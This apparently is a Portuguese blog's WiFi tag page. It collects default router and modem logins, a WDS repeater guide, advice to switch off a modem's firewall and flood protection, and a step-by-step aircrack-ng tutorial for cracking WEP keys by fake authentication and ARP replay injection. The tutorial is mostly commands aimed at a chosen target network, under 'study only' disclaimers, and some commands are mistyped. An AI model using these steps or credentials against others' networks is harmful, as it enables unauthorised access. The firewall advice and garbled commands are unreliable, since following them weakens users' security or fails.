Posts com Tag ‘wIfI’

senhaaí você precisa reconfigurar o roteador e/ou modem… apertou o botãozinho do reset e correu procurar a senha que havia deixado anotada em algum lugar, que só Deus sabe onde… quem nunca?

Com a quantidade de modems e roteadores fornecidos pelas operadoras e/ou comprados por usuários que não tem a mínima ideia se realmente precisam daquele modelo ou se poderia ter economizado uma boa grana com um modelo mais simples, fica bem difícil para o técnico lembrar, decorar e lembrar de novo de algumas informações importantes, que possibilitam o acesso às configurações do aparelho… #PartiuConfigurar

Obs1.: Digite as informações necessárias exatamente como estão descritas aqui, ou seja, maiúsculo em maiúsculo e minúsculo em minúsculo.

Obs2: Se não tem nada na frente de “usuário” ou “senha”, eu ainda preciso explicar que você não precisa digitar nada? Espero que não né eheheh #borasenha

Roteador Wireless TP-Link TL-WR741N / TL-WR741ND

Endereço : http://192.168.0.1

Usuário: admin

Senha: admin

Modem ADSL ZTE ZXDSL 831 Series

Endereço : http://192.168.254.254

Usuário: admin

Senha: admin

Modem ADSL ZTE ZXDSL 831

Endereço : http://192.168.254.254

Usuário: ZXDSL

Senha: ZXDSL

Modem ADSL USR8550

Endereço : http://192.168.1.1

Usuário:
Senha: 12345

Modem ADSL SpeedStream 5400

IP: 192.168.254.254

Usuario: admin

Senha: admin

Modem ADSL Quick Connect 5000

IP: 10.0.0.2

Usuario: admin

Senha: admin

Modem ADSL Park Alta via614R

Gateway: 192.168.1.1

Máscara de Sub Rede: 255.255.255.0

IP: 192.168.1.3

Usuário: admin

Senha: parks

Modem ADSL NEC GreatSpeed

1 – Endereço: http://192.168.7.1/admin.htm ou http://192.168.7.105/admin.htm

2 – User Name: guest

Password: guest

Modem ADSL Ericsson HM210

IP: 192.168.1.1

Usuario: root

senha: root

Modem ADSL Dynalink RTA100

usuario: root

senha: root

Modem ADSL DSLink

192.168.1.1 ( se o modem estiver conectado ao computador via placa de rede “LAN“).

192.168.1.2 ( se o modem estiver conectado ao computador via placa”USB“).

User Name: root

Password: root

Modem ADSL D-link 500G

IP: 10.0.0.3

Usuário: admin

Senha: admin

Modem ADSL SpeedTouch™510v5/v6

Endereço: http://10.0.0.138

Usuário: Administrator

Senha:

Modem ADSL Alcatel Thomson 510V4

Endereço: http://10.0.0.138

Usuário:

Senha:

Modem ADSL alcatel speed touch pro

Usuario: guest

Senha: keycode&senh@01

Modem ADSL 4TECH – Triz TZ5500E

IP: 192.168.1.1

Usuario: admin

senha: aaaaaaaa

Anúncios

roteadorDica rápida pra quem precisa ampliar o alcance do sinal WiFi seja por qual for o motivo… aqui estou utilizando como repetidor um roteador TP-Link 150mbps modelo TL-WR720N, que supre completamente minhas necessidades…
Mãos à obra: entre na configuração do seu roteador (normalmente, o IP para acesso é o 192.168.1.1, o usuário é “admin” e a senha é “admin”, porém, varia de modelo para modelo… verifique o seu na caixa ou embaixo do aparelho).
Após o acesso às configurações, vamos aos parâmetros:

1 – Caso o seu roteador tenha o mesmo endereço de IP do modem, você vai precisar alterar o IP do roteador… caso não saiba, altere por precaução…
1.1 – Acesse a guia “LAN” e em “IP Adress” altere o número para 192.168.3.1 (deixe este número anotado em algum lugar… de preferencia em uma etiqueta no próprio roteador).
2 – Vá em Wireless e habilite a opção “Enable WDS”, para criarmos a ponte de comunicação entre o modem wifi e o roteador.
3 – Clique no botão “Search” (ou “Procurar”, conforme o caso) para localizar a rede que iremos repetir…
4 – Após selecionar a rede, automaticamente os campos SSID e MAC serão preenchidos (o seu roteador será um clone do modem após reiniciar)…
5 – Digite a senha do ponto principal no campo “Password”

Agora um dos pontos mais importantes: o DNS principal da conexão: Vamos DESABILITAR o DNS do roteador para pegar o DNS do Modem.

6 – Clique em DHCP Settings, “Disable”, Salve a configuração e clique para reiniciar o roteador.
7 – Se não tiver macumba nenhuma rodando por sua conexão, Bingo! Você ganhou um frango e uns metros a mais de alcance de seu WiFi… se tiver, cara… na boa, isso aqui funciona em todo lugar… só pra você que não rsrs

Dica: É interessante mudar o nome (SSID) do repetidor para não confundir com o ponto principal, assim, você saberá exatamente de onde está acessando, evitando confusão.

Atenção: Após aplicar esta configuração, você não terá mais acesso à configuração do roteador via IP, sendo necessário resetá-lo para acessar as configurações novamente…

Modem Technicolor TC7110.bComo disse… jogo rápido e fácil: Sua internet está caindo ou simplesmente não abre nada (principalmente se você usa um Notebook ou Netbook)… você sabe que o canal do seu WiFi não está no “automático”, conflitando com frequências de telefone sem fio ou microondas (em outro post, falarei mais sobre como encontrar a frequência ideal pro seu WiFi)… e a internet não pára de cair, algumas vezes seguidamente, outras nem tanto… Seu problemas acabaram-se!

Entre nas configurações do roteador (conectado à rede, abra o navegador e digite 192.168.100.1

Usuário: 

senha: admin

(pra quem não entendeu, o campo “usuário” deve ficar em branco e a senha é “admin” em letras minúsculas)

Acesse a aba Firewall e desmarque o campo IP Flood Detection.

Desligue a opção Firewall Protection e clique em Apply.

Tá feito… se o técnico que instalou este modem pra você não fez este procedimento, faça você mesmo!

Cracker PasswordQuem nunca se perguntou se tem uma senha segura de WiFi? … ops… será que existe uma senha realmente segura? Nesse tutorial, vou ensinar como capturar e descriptografar senhas wireless. Use em SUA rede, para saber se sua senha realmente é segura… lembre-se: Roubar internet do vizinho é crime! Todo o material aqui constante, serve APENAS para estudo!!!.

Para snifar, capturar e descriptografar as senhas vamos utilizar o pacote Aircrack (aircrack-ng, airomon-ng e airodump-ng). O Aircrack é um pacote de ferramentas muito poderoso para realizar ataques a redes Wireless.

Levando em consideração que você já tem um Linux instalado (aqui estou usando o Mint) em SEU NOTEBOOK, vamos começar:

Se estiver conectado em qualquer rede WiFi, desconecte-se.

Os comandos serão dados no terminal, ou seja, via linha de comando e a grande maioria deles exige logon como Root portanto, pra não ter que ficar digitando a sua senha a todo momento, abra o terminal que você vai usar e, logo de cara, digite: # sudo su

Agora vamos ao que interessa:

Primeiramente iremos colocar a interface de rede em modo Monitor, para capturar nossos pacotes. O comando é:

airmon-ng start wlan0

Após executar este comando, será criada uma interface de rede com a nomenclatura “mon0”, que irá capturar todos os pacotes que precisamos para descriptografar a senha wep ou wpa.

  • Agora iremos escanear todas as redes disponíveis;

Com o comando a seguir iremos ver todas os dispositivos de rede sem fio ao alcance da nossa interface de rede. É possível também ver os mac-address que estão conectados a um determinado dispositivo, assim, é preciso anotar os seguintes dados sobre o nosso alvo:

  • BSSID
  • CANAL
  • CIPHER
  • AUTH
  • ESSID

É preciso também anotar um MAC-ADDRESS que esteja conectado ao alvo escolhido.

airodump-ng mon0

Hora de capturar os vetores de inicialização. No comando a serguir, iremos capturar pacotes IVS que trafegam na rede. O nome do arquivo a ser gerado é você quem define, e o canal é o canal do alvo que você definiu.

airdump-ng –ivs -w captura-ivs -c 6 mon0

Explicando o comando:

  • -i = Captura apenas pacotes que contenham Ivs (–ivs);
  • -w = Nome do arquivo que será gerado com os dados capturados;
  • -c = Canal do Access Point;
  • mon0 = interface de rede em modo monitoramento.

Agora iremos enviar um pedido de falsa autenticação com um MAC associado ao acces point que queremos quebrar a senha, por exemplo:

aireplay-ng -1 0 -e NOME_DA_REDE -a MAC_ROTEADOR -h MAC_USUÁRIO mon0

  • -1 = Essa opção enviao a autenticação falsa;
  • 0 = Aqui é o tempo para reassociação, em segundos
  • -e = ESSID do alvo, ou seja, o nome do Access Point
  • -a = Mac-Address do Access Point alvo
  • -h = Mac-Address de alguém que esteja conectado (associado) ao access Point
  • mon0 = interface de rede em modo monitor.

Feito isso, aguarde que os vetores sejam capturados. Para acelerar o processo de captura de IVS, podemos tentar enviar um Arp request para a rede, na tentativa que alguma maquina receba e comece a enviar arp replay para nós. Isso fará com que o tráfego de dados aumente rapidamente:

Enviando Arp request para a rede:

aireplay-ng -3 -b 00:13:46:18:c9:58 -h 00:1f:3b:92:d1:df mon0

  • -3 = Opção para arp request;
  • -b = Mac-Address do Access Point alvo
  • -h = Mac-Address associado ao Access Point, no nosso caso o mac que identificamos como conectado ao AP “rede-segura”
  • mon0 = interface de rede em modo monitor.

Após alguns minutos de captura de pacotes (lembrar que só é possível capturar pacotes se tivermos pessoas trafego de dados na rede) iremos analisar o arquivos gerado e tentar extrair a senha do Dispositivo.

aircrack-ng -a 1 capturar-ivs-redesegura

  • a = Modo para forçar o ataque
  • -1 = wep (se fosse WPA usaríamos o -2)

Aqui iremos selecionar a nossa rede alvo, pois os dados foram capturados por canal, assim todos as redes que estão no canal “6” entram no aquivo.

Feito isso, a senha literalmente cairá no seu colo.WallPaper do tema pra vc ;-)

Frase do dia:

A prática Hacker deve ser sempre exercida de forma ética, e nunca para prejudicar, furtar, ou sacanear ninguém. É importante saber que existem várias outras formas de capturar senhas, essa é apenas uma.

É importante lembrar, também, que da mesma forma que você quebrou a senha, é possível descobrir quem está conectado à ela, ou seja, use este artigo para aprendizado apenas.